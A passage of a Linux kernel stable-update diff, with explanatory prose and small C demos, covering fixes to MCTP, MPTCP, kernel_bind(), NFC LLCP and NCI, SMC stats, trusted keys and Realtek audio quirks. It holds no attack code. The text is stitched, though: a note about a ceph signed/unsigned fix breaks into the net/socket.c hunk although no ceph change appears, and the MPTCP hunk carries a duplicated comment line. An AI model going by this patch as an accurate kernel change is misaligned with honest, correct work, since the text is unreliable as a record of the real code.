+-		if (rt->dev->dev == dev && rt->type == RTN_LOCAL &&
+-		    refcount_inc_not_zero(&rt->refs))
+-			return rt;
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(tmp, &net->mctp.routes, list) {
++		if (tmp->dev->dev == dev && tmp->type == RTN_LOCAL &&
++		    refcount_inc_not_zero(&tmp->refs)) {
++			rt = tmp;
++			break;
++		}
+ 	}
+ 
+-	return NULL;
++	rcu_read_unlock();
++
++	return rt;
+ }
+ 
+ static int mctp_do_fragment_route(struct mctp_route *rt, struct sk_buff *skb,
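
Both mctp lookups now take their reference inside the RCU read-side section via refcount_inc_not_zero(), which refuses to resurrect an object whose count has already hit zero. A minimal userspace model of that primitive (C11 atomics; not the kernel's refcount_t implementation):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* Take a reference only if the object is still live (refcount > 0). */
static bool refcount_inc_not_zero(atomic_uint *r)
{
	unsigned int old = atomic_load(r);

	do {
		if (old == 0)
			return false;   /* object already dying; don't resurrect */
	} while (!atomic_compare_exchange_weak(r, &old, old + 1));

	return true;
}

int main(void)
{
	atomic_uint refs = 1;

	printf("live lookup: %d (refs=%u)\n",
	       refcount_inc_not_zero(&refs), (unsigned)atomic_load(&refs));
	atomic_store(&refs, 0);
	printf("dead lookup: %d (refs=%u)\n",
	       refcount_inc_not_zero(&refs), (unsigned)atomic_load(&refs));
	return 0;
}
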
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index b6e0579e72644..881e05193ac97 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3456,24 +3456,21 @@ static void schedule_3rdack_retransmission(struct sock *ssk)
+ 	sk_reset_timer(ssk, &icsk->icsk_delack_timer, timeout);
+ }
+ 
+-void mptcp_subflow_process_delegated(struct sock *ssk)
++void mptcp_subflow_process_delegated(struct sock *ssk, long status)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	struct sock *sk = subflow->conn;
+ 
+-	if (test_bit(MPTCP_DELEGATE_SEND, &subflow->delegated_status)) {
++	if (status & BIT(MPTCP_DELEGATE_SEND)) {
+ 		mptcp_data_lock(sk);
+ 		if (!sock_owned_by_user(sk))
+ 			__mptcp_subflow_push_pending(sk, ssk);
+ 		else
+ 			__set_bit(MPTCP_PUSH_PENDING, &mptcp_sk(sk)->cb_flags);
+ 		mptcp_data_unlock(sk);
+-		mptcp_subflow_delegated_done(subflow, MPTCP_DELEGATE_SEND);
+ 	}
+-	if (test_bit(MPTCP_DELEGATE_ACK, &subflow->delegated_status)) {
++	if (status & BIT(MPTCP_DELEGATE_ACK))
+ 		schedule_3rdack_retransmission(ssk);
+-		mptcp_subflow_delegated_done(subflow, MPTCP_DELEGATE_ACK);
+-	}
+ }
+ 
+ static int mptcp_hash(struct sock *sk)
+@@ -3981,14 +3978,17 @@ static int mptcp_napi_poll(struct napi_struct *napi, int budget)
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 
+ 		bh_lock_sock_nested(ssk);
+-		if (!sock_owned_by_user(ssk) &&
+-		    mptcp_subflow_has_delegated_action(subflow))
+-			mptcp_subflow_process_delegated(ssk);
+-		/* ... elsewhere tcp_release_cb_override already processed
+-		 * the action or will do at next release_sock().
+-		 * In both case must dequeue the subflow here - on the same
+-		 * CPU that scheduled it.
+-		 */
++		if (!sock_owned_by_user(ssk)) {
++			mptcp_subflow_process_delegated(ssk, xchg(&subflow->delegated_status, 0));
++		} else {
++			/* tcp_release_cb_override already processed
++			 * the action or will do at next release_sock().
++			 * In both case must dequeue the subflow here - on the same
++			 * In both cases we must dequeue the subflow here - on the same
++			 */
++			smp_wmb();
++			clear_bit(MPTCP_DELEGATE_SCHEDULED, &subflow->delegated_status);
++		}
+ 		bh_unlock_sock(ssk);
+ 		sock_put(ssk);
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 91d89a0aeb586..4ec8e0a81b5a4 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -430,9 +430,11 @@ struct mptcp_delegated_action {
+ 
+ DECLARE_PER_CPU(struct mptcp_delegated_action, mptcp_delegated_actions);
+ 
+-#define MPTCP_DELEGATE_SEND		0
+-#define MPTCP_DELEGATE_ACK		1
++#define MPTCP_DELEGATE_SCHEDULED	0
++#define MPTCP_DELEGATE_SEND		1
++#define MPTCP_DELEGATE_ACK		2
+ 
++#define MPTCP_DELEGATE_ACTIONS_MASK	(~BIT(MPTCP_DELEGATE_SCHEDULED))
+ /* MPTCP subflow context */
+ struct mptcp_subflow_context {
+ 	struct	list_head node;/* conn_list of subflows */
+@@ -543,23 +545,24 @@ mptcp_subflow_get_mapped_dsn(const struct mptcp_subflow_context *subflow)
+ 	return subflow->map_seq + mptcp_subflow_get_map_offset(subflow);
+ }
+ 
+-void mptcp_subflow_process_delegated(struct sock *ssk);
++void mptcp_subflow_process_delegated(struct sock *ssk, long actions);
+ 
+ static inline void mptcp_subflow_delegate(struct mptcp_subflow_context *subflow, int action)
+ {
++	long old, set_bits = BIT(MPTCP_DELEGATE_SCHEDULED) | BIT(action);
+ 	struct mptcp_delegated_action *delegated;
+ 	bool schedule;
+ 
+ 	/* the caller held the subflow bh socket lock */
+ 	lockdep_assert_in_softirq();
+ 
+-	/* The implied barrier pairs with mptcp_subflow_delegated_done(), and
+-	 * ensures the below list check sees list updates done prior to status
+-	 * bit changes
++	/* The implied barrier pairs with tcp_release_cb_override()
++	 * mptcp_napi_poll(), and ensures the below list check sees list
++	 * updates done prior to delegated status bits changes
+ 	 */
+-	if (!test_and_set_bit(action, &subflow->delegated_status)) {
+-		/* still on delegated list from previous scheduling */
+-		if (!list_empty(&subflow->delegated_node))
++	old = set_mask_bits(&subflow->delegated_status, 0, set_bits);
++	if (!(old & BIT(MPTCP_DELEGATE_SCHEDULED))) {
++		if (WARN_ON_ONCE(!list_empty(&subflow->delegated_node)))
+ 			return;
+ 
+ 		delegated = this_cpu_ptr(&mptcp_delegated_actions);
+@@ -584,20 +587,6 @@ mptcp_subflow_delegated_next(struct mptcp_delegated_action *delegated)
+ 	return ret;
+ }
+ 
+-static inline bool mptcp_subflow_has_delegated_action(const struct mptcp_subflow_context *subflow)
+-{
+-	return !!READ_ONCE(subflow->delegated_status);
+-}
+-
+-static inline void mptcp_subflow_delegated_done(struct mptcp_subflow_context *subflow, int action)
+-{
+-	/* pairs with mptcp_subflow_delegate, ensures delegate_node is updated before
+-	 * touching the status bit
+-	 */
+-	smp_wmb();
+-	clear_bit(action, &subflow->delegated_status);
+-}
+-
+ int mptcp_is_enabled(const struct net *net);
+ unsigned int mptcp_get_add_addr_timeout(const struct net *net);
+ int mptcp_is_checksum_enabled(const struct net *net);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index b93b08a75017b..d611783c2601f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1886,9 +1886,15 @@ static void subflow_ulp_clone(const struct request_sock *req,
+ static void tcp_release_cb_override(struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
++	long status;
+ 
+-	if (mptcp_subflow_has_delegated_action(subflow))
+-		mptcp_subflow_process_delegated(ssk);
++	/* process and clear all the pending actions, but leave the subflow in
++	 * the napi queue. To respect locking, only the same CPU that originated
++	 * the action can touch the list. mptcp_napi_poll will take care of it.
++	 */
++	status = set_mask_bits(&subflow->delegated_status, MPTCP_DELEGATE_ACTIONS_MASK, 0);
++	if (status)
++		mptcp_subflow_process_delegated(ssk, status);
+ 
+ 	tcp_release_cb(ssk);
+ }
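
The MPTCP change batches SEND/ACK requests into one status word alongside a SCHEDULED bit, so tcp_release_cb_override() can harvest all pending actions atomically while leaving the subflow queued for mptcp_napi_poll(). A hedged C11 sketch of that harvest step (bit layout taken from the patch, the atomics are userspace stand-ins for set_mask_bits()):

#include <stdatomic.h>
#include <stdio.h>

#define MPTCP_DELEGATE_SCHEDULED 0
#define MPTCP_DELEGATE_SEND      1
#define MPTCP_DELEGATE_ACK       2
#define ACTIONS_MASK (~(1UL << MPTCP_DELEGATE_SCHEDULED))

static atomic_ulong delegated_status;

int main(void)
{
	unsigned long status;

	/* delegate: set SCHEDULED plus the requested action in one shot */
	atomic_fetch_or(&delegated_status,
			(1UL << MPTCP_DELEGATE_SCHEDULED) | (1UL << MPTCP_DELEGATE_SEND));

	/* release_cb: atomically grab and clear the action bits, keep SCHEDULED */
	status = atomic_fetch_and(&delegated_status, ~ACTIONS_MASK) & ACTIONS_MASK;

	printf("actions to process: %#lx\n", status);                          /* 0x2 */
	printf("still scheduled:    %#lx\n", atomic_load(&delegated_status));  /* 0x1 */
	return 0;
}
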
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index 6574f4e651b1a..e1dea9a820505 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -1441,7 +1441,7 @@ static int bind_mcastif_addr(struct socket *sock, struct net_device *dev)
+ 	sin.sin_addr.s_addr  = addr;
+ 	sin.sin_port         = 0;
+ 
+-	return sock->ops->bind(sock, (struct sockaddr*)&sin, sizeof(sin));
++	return kernel_bind(sock, (struct sockaddr *)&sin, sizeof(sin));
+ }
+ 
+ static void get_mcast_sockaddr(union ipvs_sockaddr *sa, int *salen,
+@@ -1548,7 +1548,7 @@ static int make_receive_sock(struct netns_ipvs *ipvs, int id,
+ 
+ 	get_mcast_sockaddr(&mcast_addr, &salen, &ipvs->bcfg, id);
+ 	sock->sk->sk_bound_dev_if = dev->ifindex;
+-	result = sock->ops->bind(sock, (struct sockaddr *)&mcast_addr, salen);
++	result = kernel_bind(sock, (struct sockaddr *)&mcast_addr, salen);
+ 	if (result < 0) {
+ 		pr_err("Error binding to the multicast addr\n");
+ 		goto error;
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index 6705bb895e239..1dac28136e6a3 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -203,17 +203,13 @@ static struct nfc_llcp_sock *nfc_llcp_sock_get(struct nfc_llcp_local *local,
+ 
+ 		if (tmp_sock->ssap == ssap && tmp_sock->dsap == dsap) {
+ 			llcp_sock = tmp_sock;
++			sock_hold(&llcp_sock->sk);
+ 			break;
+ 		}
+ 	}
+ 
+ 	read_unlock(&local->sockets.lock);
+ 
+-	if (llcp_sock == NULL)
+-		return NULL;
+-
+-	sock_hold(&llcp_sock->sk);
+-
+ 	return llcp_sock;
+ }
+ 
+@@ -346,7 +342,8 @@ static int nfc_llcp_wks_sap(const char *service_name, size_t service_name_len)
+ 
+ static
+ struct nfc_llcp_sock *nfc_llcp_sock_from_sn(struct nfc_llcp_local *local,
+-					    const u8 *sn, size_t sn_len)
++					    const u8 *sn, size_t sn_len,
++					    bool needref)
+ {
+ 	struct sock *sk;
+ 	struct nfc_llcp_sock *llcp_sock, *tmp_sock;
+@@ -382,6 +379,8 @@ struct nfc_llcp_sock *nfc_llcp_sock_from_sn(struct nfc_llcp_local *local,
+ 
+ 		if (memcmp(sn, tmp_sock->service_name, sn_len) == 0) {
+ 			llcp_sock = tmp_sock;
++			if (needref)
++				sock_hold(&llcp_sock->sk);
+ 			break;
+ 		}
+ 	}
+@@ -423,7 +422,8 @@ u8 nfc_llcp_get_sdp_ssap(struct nfc_llcp_local *local,
+ 		 * to this service name.
+ 		 */
+ 		if (nfc_llcp_sock_from_sn(local, sock->service_name,
+-					  sock->service_name_len) != NULL) {
++					  sock->service_name_len,
++					  false) != NULL) {
+ 			mutex_unlock(&local->sdp_lock);
+ 
+ 			return LLCP_SAP_MAX;
+@@ -824,16 +824,7 @@ out:
+ static struct nfc_llcp_sock *nfc_llcp_sock_get_sn(struct nfc_llcp_local *local,
+ 						  const u8 *sn, size_t sn_len)
+ {
+-	struct nfc_llcp_sock *llcp_sock;
+-
+-	llcp_sock = nfc_llcp_sock_from_sn(local, sn, sn_len);
+-
+-	if (llcp_sock == NULL)
+-		return NULL;
+-
+-	sock_hold(&llcp_sock->sk);
+-
+-	return llcp_sock;
++	return nfc_llcp_sock_from_sn(local, sn, sn_len, true);
+ }
+ 
+ static const u8 *nfc_llcp_connect_sn(const struct sk_buff *skb, size_t *sn_len)
+@@ -1298,7 +1289,8 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
+ 			}
+ 
+ 			llcp_sock = nfc_llcp_sock_from_sn(local, service_name,
+-							  service_name_len);
++							  service_name_len,
++							  true);
+ 			if (!llcp_sock) {
+ 				sap = 0;
+ 				goto add_snl;
+@@ -1318,6 +1310,7 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
+ 
+ 				if (sap == LLCP_SAP_MAX) {
+ 					sap = 0;
++					nfc_llcp_sock_put(llcp_sock);
+ 					goto add_snl;
+ 				}
+ 
+@@ -1335,6 +1328,7 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
+ 
+ 			pr_debug("%p %d\n", llcp_sock, sap);
+ 
++			nfc_llcp_sock_put(llcp_sock);
+ add_snl:
+ 			sdp = nfc_llcp_build_sdres_tlv(tid, sap);
+ 			if (sdp == NULL)
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index 4ffdf2f45c444..7535afd1537e9 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -908,6 +908,11 @@ static int nci_activate_target(struct nfc_dev *nfc_dev,
+ 		return -EINVAL;
+ 	}
+ 
++	if (protocol >= NFC_PROTO_MAX) {
++		pr_err("the requested nfc protocol is invalid\n");
++		return -EINVAL;
++	}
++
+ 	if (!(nci_target->supported_protocols & (1 << protocol))) {
+ 		pr_err("target does not support the requested protocol 0x%x\n",
+ 		       protocol);
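
The nci check is the standard guard against shifting by an out-of-range protocol number, which is undefined behaviour in C once the shift count reaches the width of the type. A minimal model -- the NFC_PROTO_MAX value here is assumed for illustration, not taken from the uapi header:

#include <stdio.h>

#define NFC_PROTO_MAX 8   /* assumed; see include/uapi/linux/nfc.h */

static int activate(unsigned int supported_protocols, unsigned int protocol)
{
	if (protocol >= NFC_PROTO_MAX)
		return -1;      /* reject before shifting: 1 << 32 would be UB */
	if (!(supported_protocols & (1u << protocol)))
		return -2;      /* valid index, but target doesn't support it */
	return 0;
}

int main(void)
{
	printf("%d %d %d\n", activate(0x6, 1), activate(0x6, 3), activate(0x6, 99));
	return 0;
}
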
+diff --git a/net/rds/tcp_connect.c b/net/rds/tcp_connect.c
+index d788c6d28986f..a0046e99d6df7 100644
+--- a/net/rds/tcp_connect.c
++++ b/net/rds/tcp_connect.c
+@@ -145,7 +145,7 @@ int rds_tcp_conn_path_connect(struct rds_conn_path *cp)
+ 		addrlen = sizeof(sin);
+ 	}
+ 
+-	ret = sock->ops->bind(sock, addr, addrlen);
++	ret = kernel_bind(sock, addr, addrlen);
+ 	if (ret) {
+ 		rdsdebug("bind failed with %d at address %pI6c\n",
+ 			 ret, &conn->c_laddr);
+diff --git a/net/rds/tcp_listen.c b/net/rds/tcp_listen.c
+index 7edf2e69d3fed..b576bd252fecb 100644
+--- a/net/rds/tcp_listen.c
++++ b/net/rds/tcp_listen.c
+@@ -304,7 +304,7 @@ struct socket *rds_tcp_listen_init(struct net *net, bool isv6)
+ 		addr_len = sizeof(*sin);
+ 	}
+ 
+-	ret = sock->ops->bind(sock, (struct sockaddr *)&ss, addr_len);
++	ret = kernel_bind(sock, (struct sockaddr *)&ss, addr_len);
+ 	if (ret < 0) {
+ 		rdsdebug("could not bind %s listener socket: %d\n",
+ 			 isv6 ? "IPv6" : "IPv4", ret);
+diff --git a/net/smc/smc_stats.h b/net/smc/smc_stats.h
+index 4dbc237b7c19e..ee22d6f9a86aa 100644
+--- a/net/smc/smc_stats.h
++++ b/net/smc/smc_stats.h
+@@ -93,13 +93,14 @@ do { \
+ 	typeof(_smc_stats) stats = (_smc_stats); \
+ 	typeof(_tech) t = (_tech); \
+ 	typeof(_len) l = (_len); \
+-	int _pos = fls64((l) >> 13); \
++	int _pos; \
+ 	typeof(_rc) r = (_rc); \
+ 	int m = SMC_BUF_MAX - 1; \
+ 	this_cpu_inc((*stats).smc[t].key ## _cnt); \
+-	if (r <= 0) \
++	if (r <= 0 || l <= 0) \
+ 		break; \
+-	_pos = (_pos < m) ? ((l == 1 << (_pos + 12)) ? _pos - 1 : _pos) : m; \
++	_pos = fls64((l - 1) >> 13); \
++	_pos = (_pos <= m) ? _pos : m; \
+ 	this_cpu_inc((*stats).smc[t].key ## _pd.buf[_pos]); \
+ 	this_cpu_add((*stats).smc[t].key ## _bytes, r); \
+ } \
+@@ -139,9 +140,12 @@ while (0)
+ do { \
+ 	typeof(_len) _l = (_len); \
+ 	typeof(_tech) t = (_tech); \
+-	int _pos = fls((_l) >> 13); \
++	int _pos; \
+ 	int m = SMC_BUF_MAX - 1; \
+-	_pos = (_pos < m) ? ((_l == 1 << (_pos + 12)) ? _pos - 1 : _pos) : m; \
++	if (_l <= 0) \
++		break; \
++	_pos = fls((_l - 1) >> 13); \
++	_pos = (_pos <= m) ? _pos : m; \
+ 	this_cpu_inc((*(_smc_stats)).smc[t].k ## _rmbsize.buf[_pos]); \
+ } \
+ while (0)
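
The reworked SMC bucket macro replaces the old power-of-two special case with a single fls64((l - 1) >> 13) and bails out on non-positive lengths before shifting. How the new indexing behaves, as a standalone check -- fls64() is rebuilt here from __builtin_clzll(), and the 8K granularity and clamp come from the patch:

#include <stdio.h>

static int fls64(unsigned long long x)
{
	return x ? 64 - __builtin_clzll(x) : 0;
}

/* Bucket i covers (8K << (i - 1), 8K << i]; bucket 0 is (0, 8K]. */
static int smc_bucket(long long len, int nbuckets)
{
	int pos = fls64((unsigned long long)(len - 1) >> 13);
	int m = nbuckets - 1;

	return pos <= m ? pos : m;
}

int main(void)
{
	printf("%d %d %d %d\n",
	       smc_bucket(8192, 5),      /* 0: exactly 8K lands in the first bucket   */
	       smc_bucket(8193, 5),      /* 1: one byte more spills into the next one */
	       smc_bucket(16384, 5),     /* 1 */
	       smc_bucket(1 << 20, 5));  /* 4: clamped at the last bucket             */
	return 0;
}
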
+diff --git a/net/socket.c b/net/socket.c
+index b0169168e3f4e..04cba91c7cbe5 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -3454,7 +3454,11 @@ static long compat_sock_ioctl(struct file *file, unsigned int cmd,
+ 
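
The ceph fix is a signed/unsigned comparison trap: do_splice_direct() returns a ssize_t, and comparing it against an unsigned length converts any negative error to a huge unsigned value, so the short-copy branch never fired. A two-line demonstration:

#include <stdio.h>
#include <sys/types.h>

int main(void)
{
	ssize_t ret = -5;          /* e.g. an error from do_splice_direct() */
	size_t  src_objlen = 8;

	/* Usual arithmetic conversions make ret unsigned here, so the
	 * "short copy" test never fires for negative returns: */
	printf("unfixed: %d\n", ret < src_objlen);         /* 0 - bug */
	printf("fixed:   %d\n", ret < (long)src_objlen);   /* 1 */
	return 0;
}
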
+ int kernel_bind(struct socket *sock, struct sockaddr *addr, int addrlen)
+ {
+-	return sock->ops->bind(sock, addr, addrlen);
++	struct sockaddr_storage address;
++
++	memcpy(&address, addr, addrlen);
++
++	return sock->ops->bind(sock, (struct sockaddr *)&address, addrlen);
+ }
+ EXPORT_SYMBOL(kernel_bind);
+ 
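
kernel_bind() now bounces the caller's address through a full sockaddr_storage, so a protocol ->bind() handler (or a BPF hook rewriting the address) can neither read past nor scribble on a short caller buffer. The same defensive-copy pattern in ordinary userspace C, purely as an illustration:

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

int main(void)
{
	struct sockaddr_in sin = {
		.sin_family = AF_INET,
		.sin_port   = 0,                     /* let the kernel pick a port */
		.sin_addr   = { htonl(INADDR_LOOPBACK) },
	};
	struct sockaddr_storage address;
	int fd = socket(AF_INET, SOCK_STREAM, 0);

	/* Copy into full-size storage so the callee never touches memory
	 * beyond the caller's short sockaddr - the same idea as the patched
	 * kernel_bind(). */
	memcpy(&address, &sin, sizeof(sin));

	if (bind(fd, (struct sockaddr *)&address, sizeof(sin)) != 0)
		perror("bind");
	else
		puts("bound ok");
	close(fd);
	return 0;
}
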
+diff --git a/security/keys/trusted-keys/trusted_core.c b/security/keys/trusted-keys/trusted_core.c
+index c6fc50d67214c..85fb5c22529a7 100644
+--- a/security/keys/trusted-keys/trusted_core.c
++++ b/security/keys/trusted-keys/trusted_core.c
+@@ -44,13 +44,12 @@ static const struct trusted_key_source trusted_key_sources[] = {
+ #endif
+ };
+ 
+-DEFINE_STATIC_CALL_NULL(trusted_key_init, *trusted_key_sources[0].ops->init);
+ DEFINE_STATIC_CALL_NULL(trusted_key_seal, *trusted_key_sources[0].ops->seal);
+ DEFINE_STATIC_CALL_NULL(trusted_key_unseal,
+ 			*trusted_key_sources[0].ops->unseal);
+ DEFINE_STATIC_CALL_NULL(trusted_key_get_random,
+ 			*trusted_key_sources[0].ops->get_random);
+-DEFINE_STATIC_CALL_NULL(trusted_key_exit, *trusted_key_sources[0].ops->exit);
++static void (*trusted_key_exit)(void);
+ static unsigned char migratable;
+ 
+ enum {
+@@ -359,19 +358,16 @@ static int __init init_trusted(void)
+ 		if (!get_random)
+ 			get_random = kernel_get_random;
+ 
+-		static_call_update(trusted_key_init,
+-				   trusted_key_sources[i].ops->init);
+ 		static_call_update(trusted_key_seal,
+ 				   trusted_key_sources[i].ops->seal);
+ 		static_call_update(trusted_key_unseal,
+ 				   trusted_key_sources[i].ops->unseal);
+ 		static_call_update(trusted_key_get_random,
+ 				   get_random);
+-		static_call_update(trusted_key_exit,
+-				   trusted_key_sources[i].ops->exit);
++		trusted_key_exit = trusted_key_sources[i].ops->exit;
+ 		migratable = trusted_key_sources[i].ops->migratable;
+ 
+-		ret = static_call(trusted_key_init)();
++		ret = trusted_key_sources[i].ops->init();
+ 		if (!ret)
+ 			break;
+ 	}
+@@ -388,7 +384,8 @@ static int __init init_trusted(void)
+ 
+ static void __exit cleanup_trusted(void)
+ {
+-	static_call_cond(trusted_key_exit)();
++	if (trusted_key_exit)
++		(*trusted_key_exit)();
+ }
+ 
+ late_initcall(init_trusted);
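
The trusted-keys change replaces static calls with a direct call for init and an ordinary, NULL-checked function pointer for the exit hook -- one-shot paths gain nothing from static-call patching. The guarded-pointer shape, stubbed for userspace (the tpm_exit name is a made-up placeholder):

#include <stdio.h>

static void tpm_exit(void) { puts("tpm cleanup"); }

/* Set once during init, possibly left NULL if no backend probed. */
static void (*trusted_key_exit)(void);

static void cleanup_trusted(void)
{
	if (trusted_key_exit)
		(*trusted_key_exit)();
}

int main(void)
{
	cleanup_trusted();          /* no backend: safely does nothing */
	trusted_key_exit = tpm_exit;
	cleanup_trusted();          /* backend selected: runs its hook */
	return 0;
}
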
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 57e07aa4e136c..14e70e2f9c881 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -4639,6 +4639,22 @@ static void alc236_fixup_hp_mute_led_coefbit2(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc245_fixup_hp_mute_led_coefbit(struct hda_codec *codec,
++					  const struct hda_fixup *fix,
++					  int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
++		spec->mute_led_polarity = 0;
++		spec->mute_led_coef.idx = 0x0b;
++		spec->mute_led_coef.mask = 3 << 2;
++		spec->mute_led_coef.on = 2 << 2;
++		spec->mute_led_coef.off = 1 << 2;
++		snd_hda_gen_add_mute_led_cdev(codec, coef_mute_led_set);
++	}
++}
++
+ /* turn on/off mic-mute LED per capture hook by coef bit */
+ static int coef_micmute_led_set(struct led_classdev *led_cdev,
+ 				enum led_brightness brightness)
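
The new alc245 fixup programs a two-bit LED field at COEF index 0x0b: mask 3 << 2 selects bits 3:2, with 2 << 2 meaning on and 1 << 2 meaning off. The read-modify-write this implies, as a hedged standalone sketch (the starting register value is made up):

#include <stdio.h>

int main(void)
{
	unsigned int mask = 3 << 2;     /* bits 3:2 of COEF 0x0b */
	unsigned int on   = 2 << 2;
	unsigned int off  = 1 << 2;
	unsigned int reg  = 0xabcd;     /* pretend current register contents */

	/* Update only the LED field, leaving the other bits alone. */
	unsigned int led_on  = (reg & ~mask) | on;
	unsigned int led_off = (reg & ~mask) | off;

	printf("on=%#x off=%#x\n", led_on, led_off);
	return 0;
}
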
+@@ -6969,6 +6985,29 @@ static void alc295_fixup_dell_inspiron_top_speakers(struct hda_codec *codec,
+ 	}
+ }
+ 
++/* Forcibly assign NID 0x03 to HP and NID 0x02 to SPK */
++static void alc287_fixup_bind_dacs(struct hda_codec *codec,
++				    const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++	static const hda_nid_t conn[] = { 0x02, 0x03 }; /* exclude 0x06 */
++	static const hda_nid_t preferred_pairs[] = {
++		0x17, 0x02, 0x21, 0x03, 0
++	};
++
++	if (action != HDA_FIXUP_ACT_PRE_PROBE)
++		return;
++
++	snd_hda_override_conn_list(codec, 0x17, ARRAY_SIZE(conn), conn);
++	spec->gen.preferred_dacs = preferred_pairs;
++	spec->gen.auto_mute_via_amp = 1;
++	if (spec->gen.autocfg.speaker_pins[0] != 0x14) {
++		snd_hda_codec_write_cache(codec, 0x14, 0, AC_VERB_SET_PIN_WIDGET_CONTROL,
++					0x0); /* Make sure 0x14 is disabled */
++	}
++}
++
++
+ enum {
+ 	ALC269_FIXUP_GPIO2,
+ 	ALC269_FIXUP_SONY_VAIO,
+@@ -7227,6 +7266,10 @@ enum {
+ 	ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS,
+ 	ALC236_FIXUP_DELL_DUAL_CODECS,
+ 	ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
++	ALC245_FIXUP_HP_MUTE_LED_COEFBIT,
++	ALC245_FIXUP_HP_X360_MUTE_LEDS,
++	ALC287_FIXUP_THINKPAD_I2S_SPK,
++	ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -9296,6 +9339,26 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
+ 	},
++	[ALC245_FIXUP_HP_MUTE_LED_COEFBIT] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc245_fixup_hp_mute_led_coefbit,
++	},
++	[ALC245_FIXUP_HP_X360_MUTE_LEDS] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc245_fixup_hp_mute_led_coefbit,
++		.chained = true,
++		.chain_id = ALC245_FIXUP_HP_GPIO_LED
++	},
++	[ALC287_FIXUP_THINKPAD_I2S_SPK] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc287_fixup_bind_dacs,
++	},
++	[ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc287_fixup_bind_dacs,
++		.chained = true,
++		.chain_id = ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9531,6 +9594,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8870, "HP ZBook Fury 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8873, "HP ZBook Studio 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x887a, "HP Laptop 15s-eq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
++	SND_PCI_QUIRK(0x103c, 0x888a, "HP ENVY x360 Convertible 15-eu0xxx", ALC245_FIXUP_HP_X360_MUTE_LEDS),
+ 	SND_PCI_QUIRK(0x103c, 0x888d, "HP ZBook Power 15.6 inch G8 Mobile Workstation PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8895, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_SPEAKERS_MICMUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8896, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_MUTE_LED),
+@@ -9562,6 +9626,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8a25, "HP Victus 16-d1xxx (MB 8A25)", ALC245_FIXUP_HP_MUTE_LED_COEFBIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa0, "HP ProBook 440 G9 (MB 8A9E)", ALC236_FIXUP_HP_GPIO_LED),
